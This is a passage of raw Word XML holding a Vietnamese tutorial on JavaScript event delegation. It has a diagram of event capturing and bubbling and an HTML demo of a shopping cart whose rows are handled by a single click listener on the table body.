      </w:r>
    </w:p>
    <w:p w14:paraId="23980347" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C278C3" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">               | |                             / \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549F8CA2" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> 1. Window     | |                             | |  8. Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E2FABF" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> 2. Document   | | Giai đoạn 1:                | |  7. Document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BA2756" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> 3. &lt;body&gt;     | | CAPTURING                   | |  6. &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6583DFB0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> 4. &lt;ul&gt; (Cha) | | (Đi từ trên xuống)          | |  5. &lt;ul&gt; (Listener chặn tại đây!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F294DCA" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">               | |                             | |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E99F29C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">               \ /                             | |  Giai đoạn 3: BUBBLING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FD154D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">                ▼                               │   (Nổi bọt ngược lên)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32270184" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">             [ &lt;li&gt; (Target Phase: Đích thực tế nhận click) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D71F6ED" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Ví dụ code / demo thực tế</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381AB0FF" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73050ABD" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2379E847" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;html lang="vi"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D0A9C3" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0D59A2" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413473BE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;title&gt;Kỹ Thuật Event Delegation Chuyên Sâu&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14491C57" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D0E0B0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    .cart-table {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F48AACA" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      width: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CCBB9B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      border-collapse: collapse;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56461A4D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      margin-top: 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6BD283" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7577E3EC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    .cart-table th, .cart-table td {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136FCA00" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      border: 1px solid #cbd5e1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A51FD1" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      padding: 12px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C26925" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      text-align: left;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64489093" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDF32F7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    .btn-qty {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B30638" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      padding: 4px 8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66028009" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      margin: 0 4px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F6D67A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008ECDCE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017A1641" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B47ADB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD9EE38" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C94D6F3" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;h2&gt;Giỏ Hàng Điện Tử&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650704D0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;button type="button" id="btn-add-product"&gt;Thêm sản phẩm ngẫu nhiên&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595085EA" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="012E407F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;table class="cart-table"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666CFD7C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    &lt;thead&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E456479" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      &lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472C66E0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        &lt;th&gt;Tên sản phẩm&lt;/th&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D736F07" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        &lt;th&gt;Số lượng&lt;/th&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2077163E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        &lt;th&gt;Hành động&lt;/th&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139D12EE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      &lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEBF61A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    &lt;/thead&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764CFB6A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    &lt;!-- Chỉ gắn DUY NHẤT 1 listener trên thẻ tbody này --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025605A7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    &lt;tbody id="cart-body"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392379C3" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      &lt;tr data-id="prod-1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2102FA1F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        &lt;td&gt;Bàn phím cơ không dây&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A423E4C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        &lt;td class="qty-val"&gt;1&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5CA494" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        &lt;td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2299BB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          &lt;button type="button" class="btn-qty" data-action="increase"&gt;+&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D707E37" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          &lt;button type="button" class="btn-qty" data-action="decrease"&gt;-&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA6D14E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          &lt;button type="button" class="btn-delete" data-action="delete"&gt;Xóa&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB8888F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        &lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5BAD04" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      &lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47094ED7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    &lt;/tbody&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B226685" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C3E30C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="52E9F7F5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DA5F79" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    const cartBody = document.querySelector('#cart-body');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788DA442" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    const btnAddProduct = document.querySelector('#btn-add-product');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE36931" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="6B476852" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    // ÁP DỤNG EVENT DELEGATION: Lắng nghe toàn bộ tương tác bảng chỉ qua 1 hàm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7A04CE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    cartBody.addEventListener('click', (event) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1725C8" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // 1. Phân biệt chính xác phần tử được bấm bằng closest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C11466B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      const actionButton = event.target.closest('button');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC74BC3" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B27053" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // Nếu người dùng click vào khoảng trống trong ô td, bỏ qua</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158BFCFE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      if (!actionButton) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367551C6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="4DCEE6EE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // 2. Tìm dòng tr cha tương ứng của nút bấm đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157E15AD" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      const row = actionButton.closest('tr');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21123FD4" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      const productId = row.dataset.id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54276169" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      const qtyElement = row.querySelector('.qty-val');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D0D83B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      let currentQty = parseInt(qtyElement.textContent, 10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3804162B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="0FD33515" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // 3. Phân luồng xử lý dựa vào data-action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A828B7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      const action = actionButton.dataset.action;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322ED643" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="49DEA3C1" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      if (action === 'increase') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3CEDAA" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        qtyElement.textContent = currentQty + 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257688B2" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      } else if (action === 'decrease') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F66EAE8" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        if (currentQty &gt; 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4EA2BE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          qtyElement.textContent = currentQty - 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C63267" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F88A263" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          // Nếu giảm về 0, xóa luôn dòng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CA8B4D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          row.remove();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404EF2EC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCA1B6E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      } else if (action === 'delete') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778B20AD" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        row.remove();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F718542" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31120AEC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C39C053" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="6E93F9A8" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    // Chứng minh sức mạnh: Thêm phần tử mới vào DOM trong tương lai</w:t>
      </w:r>
    </w:p>
